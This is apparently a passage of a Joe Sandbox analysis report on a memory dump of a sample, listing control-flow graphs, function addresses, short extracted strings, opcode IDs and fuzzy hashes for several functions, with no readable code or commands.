2644 7ffaaccf0c98-7ffaaccf0cab 2634->2644 2635->2644 2655 7ffaaccf0c21-7ffaaccf0c6d 2635->2655 2638->2648 2639->2614 2646 7ffaaccf0b32-7ffaaccf0b4d 2641->2646 2643->2622 2650 7ffaaccf0ce9-7ffaaccf0d42 call 7ffaaccf0fbb call 7ffaaccf1008 2644->2650 2651 7ffaaccf0cad-7ffaaccf0cb6 2644->2651 2646->2611 2646->2612 2648->2618 2650->2608 2672 7ffaaccf0d48-7ffaaccf0d8d 2650->2672 2657 7ffaaccf0cc8-7ffaaccf0cdf 2651->2657 2658 7ffaaccf0cb8-7ffaaccf0cbe 2651->2658 2655->2634 2657->2650 2666 7ffaaccf0ce1-7ffaaccf0ce2 2657->2666 2658->2657 2666->2650 2676 7ffaaccf0d8f-7ffaaccf0d9a 2672->2676 2677 7ffaaccf0e50-7ffaaccf0e58 call 7ffaaccf1055 2676->2677 2678 7ffaaccf0da0-7ffaaccf0dbf 2676->2678 2677->2608 2681 7ffaaccf0dd8-7ffaaccf0e01 2678->2681 2682 7ffaaccf0dc1-7ffaaccf0dce 2678->2682 2689 7ffaaccf0e32-7ffaaccf0e4a 2681->2689 2690 7ffaaccf0e03-7ffaaccf0e2b call 7ffaacce7258 2681->2690 2682->2681 2685 7ffaaccf0dd0-7ffaaccf0dd6 2682->2685 2685->2681 2689->2677 2689->2678 2690->2689
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4K_H$8M%
                                              • API String ID: 0-2786014324
                                              • Opcode ID: 9bdb2f20444cf31421ff5abb8316034f2f4db97711bc43aa838b8a30e71d328d
                                              • Instruction ID: ebcd855b891511163f14a1a0a2d4516dced91a88a2cd438740c07ce8f575618a
                                              • Opcode Fuzzy Hash: 9bdb2f20444cf31421ff5abb8316034f2f4db97711bc43aa838b8a30e71d328d
                                              • Instruction Fuzzy Hash: 35027370A19B4A8FEB88DF18C494AA973E1FF59704F5085A9D41EC7296DF34EC46CB80
                                              Function 00007FFAACCF81E0 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2695 7ffaaccf81e0-7ffaacd3fa8b 2699 7ffaacd3fa8d-7ffaacd3fa9d 2695->2699 2700 7ffaacd3fa9e-7ffaacd3fbaf 2695->2700 2716 7ffaacd3fbda-7ffaacd3fd08 call 7ffaacd3e148 * 3 2700->2716 2717 7ffaacd3fbb1-7ffaacd3fbd9 2700->2717 2734 7ffaacd3fd0e-7ffaacd3fd6a call 7ffaacd3e138 2716->2734 2735 7ffaacd44995-7ffaacd449a5 2716->2735 2717->2716 2741 7ffaacd3fd6f-7ffaacd3fdac 2734->2741 2739 7ffaacd449a8-7ffaacd449d7 2735->2739 2740 7ffaacd449a7 2735->2740 2740->2739 2741->2735 2746 7ffaacd3fdb2-7ffaacd3ffe1 call 7ffaacd3e138 * 3 2741->2746 2746->2735
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 1$m
                                              • API String ID: 0-402893558
                                              • Opcode ID: 1ef539cafb5ace20d5a87d0d698d63df8a7f865b18b6467620aee317c17fbdf9
                                              • Instruction ID: 65bcc851f9bad4a6e0b68c4fc8143cfae127fa2ea8a0998d774ebd86983068df
                                              • Opcode Fuzzy Hash: 1ef539cafb5ace20d5a87d0d698d63df8a7f865b18b6467620aee317c17fbdf9
                                              • Instruction Fuzzy Hash: 9A02A6B1A18B498FE799DB18C8557A9BBE1FF59300F1441FEE05DD3282CF389A458B42
                                              Function 00007FFAACCF76C8 Relevance: 2.9, Strings: 2, Instructions: 369COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2772 7ffaaccf76c8-7ffaacd2750f 2776 7ffaacd27515-7ffaacd27529 2772->2776 2777 7ffaacd28583-7ffaacd2859f 2772->2777 2782 7ffaacd275bb-7ffaacd275d2 2776->2782 2783 7ffaacd2752f-7ffaacd27553 2776->2783 2780 7ffaacd285a1-7ffaacd285a5 2777->2780 2781 7ffaacd285a7-7ffaacd285a9 2777->2781 2780->2781 2784 7ffaacd285b7-7ffaacd285bd 2781->2784 2788 7ffaacd2766d-7ffaacd2769a 2782->2788 2789 7ffaacd275d8-7ffaacd27605 2782->2789 2783->2782 2796 7ffaacd27555-7ffaacd2755c 2783->2796 2791 7ffaacd285be 2784->2791 2792 7ffaacd285bf-7ffaacd285ff 2784->2792 2801 7ffaacd2769c-7ffaacd276a0 2788->2801 2802 7ffaacd276b7-7ffaacd276c8 2788->2802 2789->2788 2803 7ffaacd27607-7ffaacd2760b 2789->2803 2791->2792 2792->2784 2804 7ffaacd28601-7ffaacd28609 2792->2804 2796->2777 2800 7ffaacd27562-7ffaacd275b6 call 7ffaacd25010 2796->2800 2800->2782 2801->2802 2806 7ffaacd276a2-7ffaacd276a9 2801->2806 2802->2777 2803->2788 2807 7ffaacd2760d-7ffaacd27611 2803->2807 2808 7ffaacd2860b-7ffaacd28617 2804->2808 2809 7ffaacd28651-7ffaacd2865a call 7ffaaccf76d0 2804->2809 2806->2777 2813 7ffaacd276af-7ffaacd276b2 2806->2813 2807->2777 2814 7ffaacd27617-7ffaacd27621 2807->2814 2821 7ffaacd2863e-7ffaacd28650 2808->2821 2822 7ffaacd28619-7ffaacd28628 2808->2822 2817 7ffaacd2865f-7ffaacd2867a 2809->2817 2813->2802 2818 7ffaacd2763a-7ffaacd27648 2814->2818 2819 7ffaacd27623-7ffaacd27630 2814->2819 2818->2777 2823 7ffaacd2764e-7ffaacd27660 2818->2823 2819->2818 2825 7ffaacd27632-7ffaacd27638 2819->2825 2822->2809 2831 7ffaacd2862a-7ffaacd2863c 2822->2831 2823->2777 2827 7ffaacd27666-7ffaacd27669 2823->2827 2825->2818 2827->2788 2831->2809 2831->2821
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0#%$x!%
                                              • API String ID: 0-683446285
                                              • Opcode ID: 4eef726f25d3796294415672d414a2a8be69aa856f2071cdcfa8f53676c17eb6
                                              • Instruction ID: d938f3d7da6f40d60aebbb41558c175b12d214bb5953c198db229f8d65887474
                                              • Opcode Fuzzy Hash: 4eef726f25d3796294415672d414a2a8be69aa856f2071cdcfa8f53676c17eb6
                                              • Instruction Fuzzy Hash: FBA1F371B1DA098FF7A89B2CD849AB077D0FF56354B0941B9E05DD31A2EE29EC4587C0
                                              Function 00007FFAACCE8285 Relevance: 2.8, Strings: 2, Instructions: 316COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2897 7ffaacce8285-7ffaacce828d 2898 7ffaacce8290-7ffaacce829d 2897->2898 2899 7ffaacce828f 2897->2899 2900 7ffaacce82a0-7ffaacce8311 2898->2900 2901 7ffaacce829f 2898->2901 2899->2898 2906 7ffaacce8313-7ffaacce8318 2900->2906 2907 7ffaacce831a-7ffaacce831e 2900->2907 2901->2900 2908 7ffaacce8321-7ffaacce8339 2906->2908 2907->2908 2910 7ffaacce8369-7ffaacce8382 2908->2910 2911 7ffaacce833b-7ffaacce833c 2908->2911 2914 7ffaacce8385-7ffaacce83ba 2910->2914 2912 7ffaacce833f-7ffaacce834f 2911->2912 2912->2914 2916 7ffaacce8351-7ffaacce8367 2912->2916 2920 7ffaacce8404-7ffaacce8414 2914->2920 2921 7ffaacce83bc-7ffaacce83d5 2914->2921 2916->2910 2916->2912 2922 7ffaacce83d7-7ffaacce83da 2921->2922 2923 7ffaacce842e-7ffaacce843c 2921->2923 2924 7ffaacce83dc-7ffaacce83e7 2922->2924 2925 7ffaacce845b-7ffaacce8469 2922->2925 2927 7ffaacce8486-7ffaacce848b 2923->2927 2928 7ffaacce843e-7ffaacce8459 2923->2928 2924->2920 2930 7ffaacce84c2-7ffaacce84cb 2925->2930 2931 7ffaacce846b-7ffaacce846e 2925->2931 2932 7ffaacce850c-7ffaacce850d 2927->2932 2933 7ffaacce848d-7ffaacce84a1 2927->2933 2928->2925 2934 7ffaacce8515-7ffaacce8539 2930->2934 2935 7ffaacce84cd-7ffaacce84ed 2930->2935 2936 7ffaacce8470-7ffaacce8472 2931->2936 2937 7ffaacce84ef-7ffaacce84f2 2931->2937 2938 7ffaacce8510-7ffaacce8513 2932->2938 2939 7ffaacce850f 2932->2939 2957 7ffaacce84a8-7ffaacce84ab call 7ffaacce0540 2933->2957 2940 7ffaacce8474 2936->2940 2941 7ffaacce84ee 2936->2941 2942 7ffaacce84f4-7ffaacce84f9 2937->2942 2938->2934 2939->2938 2943 7ffaacce84b6-7ffaacce84bb 2940->2943 2944 7ffaacce8476-7ffaacce8478 2940->2944 2941->2937 2946 7ffaacce84fa-7ffaacce84fb 2942->2946 2949 7ffaacce84bc-7ffaacce84c1 2943->2949 2944->2942 2948 7ffaacce847a 2944->2948 2950 7ffaacce84fe 2946->2950 2951 7ffaacce84fd 2946->2951 2948->2949 2952 7ffaacce847c-7ffaacce847e 2948->2952 2949->2930 2954 7ffaacce8500-7ffaacce850a 2950->2954 2951->2950 2952->2946 2955 7ffaacce8480 2952->2955 2954->2932 2955->2930 2956 7ffaacce8482-7ffaacce8484 2955->2956 2956->2927 2956->2954 2959 7ffaacce84b0-7ffaacce84b4 call 7ffaacce84c2 2957->2959 2959->2943
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HB%$K_^
                                              • API String ID: 0-3010496869
                                              • Opcode ID: ce47376d609741f21640a6595c826c427c7737d26f83942ef802fa2ebe86cea9
                                              • Instruction ID: e8562df5f30a5c6ec012e9d192cce47091064e2dd7741731d743ca94ef65a00c
                                              • Opcode Fuzzy Hash: ce47376d609741f21640a6595c826c427c7737d26f83942ef802fa2ebe86cea9
                                              • Instruction Fuzzy Hash: 8AA1F86290E6894FF7669B3848265B57FE1EF83310F0941FAD48DCB5D3DE1CA90A8391
                                              Function 00007FFAACCEFA55 Relevance: 2.5, Strings: 1, Instructions: 1214COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2961 7ffaaccefa55-7ffaaccefa87 2962 7ffaaccefa89-7ffaaccefa9f 2961->2962 2963 7ffaaccefad1-7ffaaccefad2 2961->2963 2964 7ffaaccefaf8-7ffaaccefafc 2962->2964 2965 7ffaaccefaa1-7ffaaccefaa4 2962->2965 2968 7ffaaccefb46 2964->2968 2969 7ffaaccefafe-7ffaaccefb24 2964->2969 2966 7ffaaccefaa6-7ffaaccefaad 2965->2966 2967 7ffaaccefb25-7ffaaccefb29 2965->2967 2966->2963 2970 7ffaaccefb82-7ffaaccefb86 2967->2970 2971 7ffaaccefb2b-7ffaaccefb2e 2967->2971 2972 7ffaaccefb88-7ffaaccefb8b 2968->2972 2973 7ffaaccefb48-7ffaaccefb4b 2968->2973 2969->2967 2970->2972 2974 7ffaaccefb30-7ffaaccefb32 2971->2974 2975 7ffaaccefbaf-7ffaaccefbb2 2971->2975 2976 7ffaaccefbd5-7ffaaccefbec 2972->2976 2977 7ffaaccefb8d-7ffaaccefbad 2972->2977 2978 7ffaaccefbcc-7ffaaccefbcd 2973->2978 2979 7ffaaccefb4d-7ffaaccefb61 2973->2979 2980 7ffaaccefb34 2974->2980 2981 7ffaaccefbae 2974->2981 2986 7ffaaccefbb4-7ffaaccefbb9 2975->2986 2984 7ffaaccefc36-7ffaaccf033b 2976->2984 2985 7ffaaccefbee-7ffaaccefc18 2976->2985 2982 7ffaaccefbd0-7ffaaccefbd3 2978->2982 2983 7ffaaccefbcf 2978->2983 3011 7ffaaccefb68-7ffaaccefb6b call 7ffaacceeff0 2979->3011 2987 7ffaaccefb76-7ffaaccefb7b 2980->2987 2988 7ffaaccefb36-7ffaaccefb38 2980->2988 2981->2975 2982->2976 2983->2982 3064 7ffaaccf033c-7ffaaccf038e 2984->3064 2989 7ffaaccefc1e-7ffaaccefc33 call 7ffaacce8b38 2985->2989 2990 7ffaaccf04ea-7ffaaccf0504 2985->2990 2994 7ffaaccefbba-7ffaaccefbbb 2986->2994 2998 7ffaaccefb7c-7ffaaccefb81 2987->2998 2988->2986 2997 7ffaaccefb3a 2988->2997 2989->2984 2999 7ffaaccf050a-7ffaaccf051b 2990->2999 2995 7ffaaccefbbe 2994->2995 2996 7ffaaccefbbd 2994->2996 3001 7ffaaccefbc0-7ffaaccefbca 2995->3001 2996->2995 2997->2998 3002 7ffaaccefb3c-7ffaaccefb3e 2997->3002 3003 7ffaaccf0522 call 7ffaacce7260 2999->3003 3004 7ffaaccf051d 2999->3004 3001->2978 3002->2994 3008 7ffaaccefb40 3002->3008 3013 7ffaaccf0527-7ffaaccf054b 3003->3013 3004->3003 3008->2970 3012 7ffaaccefb42-7ffaaccefb44 3008->3012 3016 7ffaaccefb70-7ffaaccefb74 call 7ffaaccefb82 3011->3016 3012->2968 3012->3001 3017 7ffaaccf0552-7ffaaccf055a 3013->3017 3016->2987 3067 7ffaaccf03e7-7ffaaccf03f9 3064->3067 3068 7ffaaccf0390-7ffaaccf0393 3064->3068 3075 7ffaaccf03ff-7ffaaccf040d 3067->3075 3076 7ffaaccf048d-7ffaaccf0490 call 7ffaaccf055b 3067->3076 3069 7ffaaccf0414 3068->3069 3070 7ffaaccf0395-7ffaaccf0397 3068->3070 3072 7ffaaccf0415-7ffaaccf0419 3069->3072 3073 7ffaaccf0399 3070->3073 3074 7ffaaccf0413 3070->3074 3077 7ffaaccf0472-7ffaaccf0481 3072->3077 3078 7ffaaccf041a-7ffaaccf041c 3072->3078 3079 7ffaaccf03dd-7ffaaccf03e5 3073->3079 3080 7ffaaccf039b-7ffaaccf03a2 3073->3080 3074->3069 3075->3074 3085 7ffaaccf0495-7ffaaccf0497 3076->3085 3077->3076 3082 7ffaaccf0420-7ffaaccf0432 3078->3082 3079->3067 3080->3064 3083 7ffaaccf03a4-7ffaaccf03bc 3080->3083 3092 7ffaaccf0434-7ffaaccf0440 call 7ffaacce7238 3082->3092 3093 7ffaaccf044a-7ffaaccf044b 3082->3093 3083->3072 3086 7ffaaccf03be-7ffaaccf03c1 3083->3086 3090 7ffaaccf049f-7ffaaccf04b2 3085->3090 3088 7ffaaccf0442-7ffaaccf0448 3086->3088 3089 7ffaaccf03c3-7ffaaccf03c5 3086->3089 3088->3077 3094 7ffaaccf03c7-7ffaaccf03cc 3089->3094 3095 7ffaaccf0441 3089->3095 3090->2999 3091 7ffaaccf04b4-7ffaaccf04c5 3090->3091 3101 7ffaaccf04cd-7ffaaccf04e3 call 7ffaaccef0a8 3091->3101 3092->3095 3096 7ffaaccf044d-7ffaaccf0452 call 7ffaacce7228 3093->3096 3094->3096 3098 7ffaaccf03ce-7ffaaccf03d7 3094->3098 3095->3088 3104 7ffaaccf0453-7ffaaccf046a call 7ffaacce7230 3096->3104 3103 7ffaaccf03d9 3098->3103 3098->3104 3108 7ffaaccf04e8 3101->3108 3103->3082 3107 7ffaaccf03db 3103->3107 3104->3077 3107->3079 3108->3017
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %
                                              • API String ID: 0-1703841086
                                              • Opcode ID: 2e29aa0094c3f8435d3f5dfc009ee6db662a9a7f24523c9d6e56180e01575c57
                                              • Instruction ID: 02268db60caf010f14d80e057696f2050d7613406a09d134541093b8fcb74cc8
                                              • Opcode Fuzzy Hash: 2e29aa0094c3f8435d3f5dfc009ee6db662a9a7f24523c9d6e56180e01575c57
                                              • Instruction Fuzzy Hash: 2582967160DB898FEB4ADF288820A647FF1DF9734071841EBD449CB6D3D924AD8587A3
                                              Function 00007FFAACCF5D38 Relevance: 2.1, Strings: 1, Instructions: 850COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3445 7ffaaccf5d38-7ffaacd2488e 3448 7ffaacd24894-7ffaacd248ab 3445->3448 3449 7ffaacd24a07-7ffaacd24a0d 3445->3449 3455 7ffaacd248ad-7ffaacd248b1 3448->3455 3456 7ffaacd248e5-7ffaacd2495d call 7ffaaccf75b8 3448->3456 3451 7ffaacd24a0f-7ffaacd24a1c 3449->3451 3452 7ffaacd24a20-7ffaacd24a23 3449->3452 3451->3452 3458 7ffaacd24a1e 3451->3458 3453 7ffaacd24a5b-7ffaacd24a61 3452->3453 3454 7ffaacd24a25-7ffaacd24a2d 3452->3454 3462 7ffaacd24a63-7ffaacd24a70 3453->3462 3463 7ffaacd24a74-7ffaacd24a77 3453->3463 3459 7ffaacd24df3-7ffaacd24e09 3454->3459 3460 7ffaacd24a33-7ffaacd24a58 3454->3460 3455->3459 3461 7ffaacd248b7-7ffaacd248c2 3455->3461 3510 7ffaacd2495f-7ffaacd24993 3456->3510 3511 7ffaacd24999-7ffaacd24a04 3456->3511 3458->3452 3480 7ffaacd24e0b 3459->3480 3481 7ffaacd24e0d-7ffaacd24e19 3459->3481 3460->3453 3466 7ffaacd24d2f-7ffaacd24d69 call 7ffaaccfe100 3461->3466 3467 7ffaacd248c8-7ffaacd248da 3461->3467 3462->3463 3476 7ffaacd24a72 3462->3476 3469 7ffaacd24aaf-7ffaacd24ab5 3463->3469 3470 7ffaacd24a79-7ffaacd24a81 3463->3470 3534 7ffaacd24d70-7ffaacd24d92 3466->3534 3467->3466 3486 7ffaacd248e0-7ffaacd248e3 3467->3486 3472 7ffaacd24ab7-7ffaacd24ac7 3469->3472 3473 7ffaacd24ac9-7ffaacd24acc 3469->3473 3470->3459 3477 7ffaacd24a87-7ffaacd24aac 3470->3477 3472->3473 3483 7ffaacd24aed-7ffaacd24af1 3473->3483 3484 7ffaacd24ace-7ffaacd24ad4 3473->3484 3476->3463 3477->3469 3480->3481 3489 7ffaacd24e4d-7ffaacd24e5a 3480->3489 3490 7ffaacd24e2a-7ffaacd24e34 3481->3490 3483->3459 3494 7ffaacd24af7-7ffaacd24b29 3483->3494 3491 7ffaacd24ad6-7ffaacd24ae6 3484->3491 3492 7ffaacd24ae8-7ffaacd24aeb 3484->3492 3486->3456 3500 7ffaacd24e5c-7ffaacd24e6c 3489->3500 3501 7ffaacd24e6e-7ffaacd24ea1 3489->3501 3496 7ffaacd24e44-7ffaacd24e4c 3490->3496 3497 7ffaacd24e36-7ffaacd24e39 3490->3497 3491->3492 3492->3483 3502 7ffaacd24b2c-7ffaacd24b32 3492->3502 3494->3502 3496->3489 3505 7ffaacd24e3f 3497->3505 3506 7ffaacd24f21-7ffaacd24f39 3497->3506 3500->3501 3525 7ffaacd24f3f-7ffaacd24f46 3501->3525 3526 7ffaacd24ea7-7ffaacd24ebd 3501->3526 3508 7ffaacd24b45-7ffaacd24b48 3502->3508 3509 7ffaacd24b34-7ffaacd24b44 3502->3509 3512 7ffaacd24f4c-7ffaacd24f54 3505->3512 3506->3525 3506->3526 3517 7ffaacd24b4e-7ffaacd24b51 3508->3517 3518 7ffaacd24be3-7ffaacd24be9 3508->3518 3509->3508 3510->3511 3551 7ffaacd24d24-7ffaacd24d2e 3510->3551 3511->3449 3519 7ffaacd24b53-7ffaacd24b62 3517->3519 3520 7ffaacd24b64-7ffaacd24b6f call 7ffaaccf5e00 3517->3520 3521 7ffaacd24beb-7ffaacd24bfb 3518->3521 3522 7ffaacd24bfc-7ffaacd24bff 3518->3522 3519->3520 3520->3534 3549 7ffaacd24b75-7ffaacd24b88 call 7ffaaccf5e00 3520->3549 3521->3522 3532 7ffaacd24c5a-7ffaacd24c60 3522->3532 3533 7ffaacd24c01-7ffaacd24c07 3522->3533 3525->3512 3527 7ffaacd24ebf-7ffaacd24ecf 3526->3527 3528 7ffaacd24ed1-7ffaacd24ee3 3526->3528 3527->3528 3558 7ffaacd24f00-7ffaacd24f20 3528->3558 3559 7ffaacd24ee5-7ffaacd24efe 3528->3559 3543 7ffaacd24c73-7ffaacd24c76 3532->3543 3544 7ffaacd24c62-7ffaacd24c72 3532->3544 3538 7ffaacd24c1a-7ffaacd24c2d call 7ffaaccf5e00 3533->3538 3539 7ffaacd24c09-7ffaacd24c19 3533->3539 3563 7ffaacd24d95-7ffaacd24daa call 7ffaaccfe100 3534->3563 3538->3459 3570 7ffaacd24c33-7ffaacd24c57 3538->3570 3539->3538 3546 7ffaacd24d02-7ffaacd24d08 3543->3546 3547 7ffaacd24c77-7ffaacd24c82 3543->3547 3544->3543 3564 7ffaacd24d1b-7ffaacd24d1e 3546->3564 3565 7ffaacd24d0a-7ffaacd24d1a 3546->3565 3556 7ffaacd24c95-7ffaacd24ca1 3547->3556 3557 7ffaacd24c84-7ffaacd24c94 3547->3557 3549->3459 3577 7ffaacd24b8e-7ffaacd24bb6 call 7ffaaccf75b8 call 7ffaaccf5e00 3549->3577 3556->3459 3568 7ffaacd24ca2-7ffaacd24cb6 3556->3568 3557->3556 3559->3506 3559->3558 3566 7ffaacd24db1-7ffaacd24dbc 3563->3566 3564->3551 3564->3566 3565->3564 3566->3563 3581 7ffaacd24dbe-7ffaacd24dd3 3566->3581 3574 7ffaacd24cc4-7ffaacd24cde 3568->3574 3575 7ffaacd24cb8-7ffaacd24cc2 3568->3575 3570->3532 3582 7ffaacd24ce0-7ffaacd24cff 3574->3582 3575->3582 3577->3459 3594 7ffaacd24bbc-7ffaacd24be0 3577->3594 3581->3490 3589 7ffaacd24dd5-7ffaacd24df2 call 7ffaaccfe100 3581->3589 3582->3546 3589->3459 3594->3518
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: UN_H
                                              • API String ID: 0-3803646079
                                              • Opcode ID: 084fa4edecc21c544c412d7fa77af86f0ea27455c58f908766deee90ed631289
                                              • Instruction ID: c4a81d21f4cc4a89bc6bf6d167f770d332f7131aa7943b12bea2c0cfa395bf8a
                                              • Opcode Fuzzy Hash: 084fa4edecc21c544c412d7fa77af86f0ea27455c58f908766deee90ed631289
                                              • Instruction Fuzzy Hash: B542E131B1EA4A8BF7E99B2C94556317BD2EF86314B0480BDD45EC7296EE25EC0983C1
                                              Function 00007FFAACD34748 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: bH_H
                                              • API String ID: 0-2345055445
                                              • Opcode ID: 791d1f9f12c3942dc3ec4fafa28d733cfc60c273c6284177ba592fd0203de90c
                                              • Instruction ID: 5e880ed2231c5dbb3145797aca81ac42f27b99226b44681d2fe5960e24727316
                                              • Opcode Fuzzy Hash: 791d1f9f12c3942dc3ec4fafa28d733cfc60c273c6284177ba592fd0203de90c
                                              • Instruction Fuzzy Hash: 7C02D474B0DA498FEB88DB18C855A75B7E2EF96300B1481BED05EC7286CF24EC46C781
                                              Function 00007FFAACCF7000 Relevance: 1.8, Strings: 1, Instructions: 585COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: eN_H
                                              • API String ID: 0-312275166
                                              • Opcode ID: 8095c24de090e26943cc7d93d89825d45721dc05f7018021db6b7c981cd5abbb
                                              • Instruction ID: 82f57d5c30e61fb801f3c7053b8b4b3c920e9da57dcc4455edbf219f076207fd
                                              • Opcode Fuzzy Hash: 8095c24de090e26943cc7d93d89825d45721dc05f7018021db6b7c981cd5abbb
                                              • Instruction Fuzzy Hash: EFE14AA2B1DE4A4FF7A5A73CA41A6FA3BD1DF95220B0441BBD04EC3186ED28DC4643C1
                                              Function 00007FFAACD1AEF0 Relevance: 1.8, Strings: 1, Instructions: 573COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: f7c4e9b82392cc2a2ab5cef1f4adb8a59d19cca3ac36e16e9fa5df52dc7da223
                                              • Instruction ID: 5b06c303f28f74546d678b19f18c9dbba5d8e8f9402f0bc21068abe5575d892c
                                              • Opcode Fuzzy Hash: f7c4e9b82392cc2a2ab5cef1f4adb8a59d19cca3ac36e16e9fa5df52dc7da223
                                              • Instruction Fuzzy Hash: 2C02D270618B498FE768DB18C485AB6B3E1FF99310F10857ED09EC7696DA34F846CB81
                                              Function 00007FFAACCEC450 Relevance: 1.7, Instructions: 1743COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fa1d7485f5e4eb0c6a2971c68c831caa520cc1c4d187b382ccbc0c3434c48d6
                                              • Instruction ID: 60bb1d3345518e76a29dff00732d65ba2f65b097209780933c9379f7a20d3b77
                                              • Opcode Fuzzy Hash: 5fa1d7485f5e4eb0c6a2971c68c831caa520cc1c4d187b382ccbc0c3434c48d6
                                              • Instruction Fuzzy Hash: 52D22D70609A4A8FEB85EF2CC454BA977E2EF5A340F1845E5E41CCB297CA34EC85CB51
                                              Function 00007FFAACCE2731 Relevance: 1.6, Strings: 1, Instructions: 339COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: yR_H
                                              • API String ID: 0-493830893
                                              • Opcode ID: ce7db7de788b065016cbbd668e9701c0051061cef1d44cb02424adac1c1151b2
                                              • Instruction ID: 73d4ece2433b86ca61bef01918575b9f59b03ca94081515ce7cdd1a48b9c241f
                                              • Opcode Fuzzy Hash: ce7db7de788b065016cbbd668e9701c0051061cef1d44cb02424adac1c1151b2
                                              • Instruction Fuzzy Hash: 84A1F972E1CA494FE794EB2CD8456B9B7E1EF9A350F044276D04EC3282EF34AC864781
                                              Function 00007FFAACCE0E30 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: yR_H
                                              • API String ID: 0-493830893
                                              • Opcode ID: 0ee9ee83894ae554859d2db4403c876eae9d02774ba3b24cada2e13f78819295
                                              • Instruction ID: dcbf128d5bcb2edafcaa7059d37463b86fe2490c60104a48a4f000f48be39aca
                                              • Opcode Fuzzy Hash: 0ee9ee83894ae554859d2db4403c876eae9d02774ba3b24cada2e13f78819295
                                              • Instruction Fuzzy Hash: 2EA1EA72E1CA094FE794EB2CD8456B9B7E1EF9A350F004276D44ED3282EF34AD864781
